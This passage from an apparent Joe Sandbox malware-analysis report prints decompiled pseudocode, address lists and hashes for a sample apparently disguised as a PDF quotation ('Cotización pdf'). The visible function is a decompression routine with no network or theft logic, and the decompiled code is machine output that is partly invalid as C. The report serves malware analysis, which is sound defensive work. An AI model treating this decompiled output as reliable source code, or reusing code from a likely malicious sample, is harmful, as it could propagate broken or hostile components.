												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004062eb
0x004062eb
0x004062ef
0x00406310
0x00406317
0x0040631d
0x00406323
0x00406335
0x0040633b
0x00406340
0x00000000
0x004062f1
0x004062f7
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8
0x00000000
0x004062ef

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406409, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
